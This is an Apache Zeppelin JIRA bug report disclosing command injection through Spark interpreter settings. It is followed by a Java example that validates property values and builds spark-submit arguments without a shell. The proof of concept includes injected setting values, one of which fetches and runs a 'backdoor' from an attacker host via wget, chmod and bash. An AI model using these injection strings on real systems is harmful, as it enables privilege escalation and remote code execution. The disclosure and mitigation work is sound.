Alexey Sintsov created ZEPPELIN-4194:
----------------------------------------
Summary: System command injection via Spark Interpreter configuration
Key: ZEPPELIN-4194
URL: https://issues.apache.org/jira/browse/ZEPPELIN-4194
Project: Zeppelin
Issue Type: Bug
Components: zeppelin-server
Affects Versions: 0.8.0
Reporter: Alexey Sintsov
Hi
We have found that system commands can be injected into Spark interpreter
settings (maybe other interpreters' settings are affected as well). This
injection will be executed whenever any Spark job runs.
This injection could be a security issue in environments where users have
permission to change interpreter settings - then it leads to local privilege
escalation (normally a user can execute notes as a special user that is used for
the interpreter, but injected commands will be executed as the zeppelin user).
*PoC:*
(this example will also crash Spark jobs because the command line is truncated)
spark.executor.memory=16g;touch${IFS%?}/tmp/test
or another example; in this case Spark jobs will be executed normally without
interruption
spark.driver.cores=2`\{wget,-O,/tmp/x,http://attacker_server:443/backdoor};\{chmod,0755,/tmp/x};\{bash,-c,/tmp/x}`
*Expectation:*
Parameters should be validated and filtered to prevent injections into the
command line.
--
This message was sent by Atlassian JIRA
(v7.6.3#76005)
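The expectation stated in the report is that interpreter property values should be validated before they reach the spark-submit command line. The following is an added illustration of that mitigation, not Zeppelin's own code and not the fix that was applied to this issue: the class name, the allowlist patterns and the argv layout are assumptions. The two controls it shows are (1) an allowlist check that rejects, rather than escapes, any key or value containing characters outside the shapes Spark properties actually take, and (2) building the launch command as an argument list handed to ProcessBuilder, so no shell ever parses the values even if the allowlist is later loosened.

```java
import java.util.ArrayList;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import java.util.regex.Pattern;

/**
 * Illustrative validator for interpreter properties that end up on a
 * spark-submit command line. Hypothetical example code, not Zeppelin's;
 * the allowlists and the argv layout are assumptions.
 */
public final class SparkConfValidator {

    // Spark property keys are dotted identifiers, e.g. spark.executor.memory.
    private static final Pattern KEY = Pattern.compile("^[A-Za-z0-9_.\\-]+$");

    // Values cover the common shapes: sizes ("16g"), numbers, paths, URLs,
    // comma-separated lists. Shell metacharacters (; ` $ { } | & < > " ' \
    // and all whitespace) are simply not in the set, so they are rejected.
    private static final Pattern VALUE = Pattern.compile("^[A-Za-z0-9_.:/=,@+\\-]*$");

    private SparkConfValidator() {}

    public static boolean isValidKey(String key) {
        return key != null && KEY.matcher(key).matches();
    }

    public static boolean isValidValue(String value) {
        return value != null && VALUE.matcher(value).matches();
    }

    /**
     * Builds an argument vector for spark-submit. Each property becomes its
     * own "--conf key=value" element of a List that is passed straight to
     * ProcessBuilder, so the values are never interpreted by a shell. The
     * allowlist check is defence in depth for any code path that still joins
     * the list into a script line.
     */
    public static List<String> buildSubmitArgs(String sparkSubmit, Map<String, String> props) {
        List<String> argv = new ArrayList<>();
        argv.add(sparkSubmit);
        for (Map.Entry<String, String> e : props.entrySet()) {
            if (!isValidKey(e.getKey())) {
                throw new IllegalArgumentException("rejected property key: " + e.getKey());
            }
            if (!isValidValue(e.getValue())) {
                throw new IllegalArgumentException("rejected value for " + e.getKey());
            }
            argv.add("--conf");
            argv.add(e.getKey() + "=" + e.getValue());
        }
        return argv;
    }

    public static void main(String[] args) {
        // Constructed sample: ordinary settings pass through unchanged.
        Map<String, String> ok = new LinkedHashMap<>();
        ok.put("spark.executor.memory", "16g");
        ok.put("spark.driver.cores", "2");
        System.out.println("accepted: " + buildSubmitArgs("spark-submit", ok));

        // The report's first PoC value: ';' and '${IFS%?}' fall outside the allowlist.
        Map<String, String> bad = new LinkedHashMap<>();
        bad.put("spark.executor.memory", "16g;touch${IFS%?}/tmp/test");
        try {
            buildSubmitArgs("spark-submit", bad);
        } catch (IllegalArgumentException ex) {
            System.out.println("rejected: " + ex.getMessage());
        }

        // Launching with the list form of ProcessBuilder keeps a shell out of the
        // picture entirely (left commented so the example runs without Spark):
        // new ProcessBuilder(buildSubmitArgs("spark-submit", ok)).inheritIO().start();
    }
}
```

Rejecting rather than escaping is deliberate: the set of characters that a given shell treats specially (and the `${IFS%?}` and `{a,b}` tricks in the report show how many there are) is hard to enumerate, whereas the set of characters a legitimate Spark property value needs is small and stable.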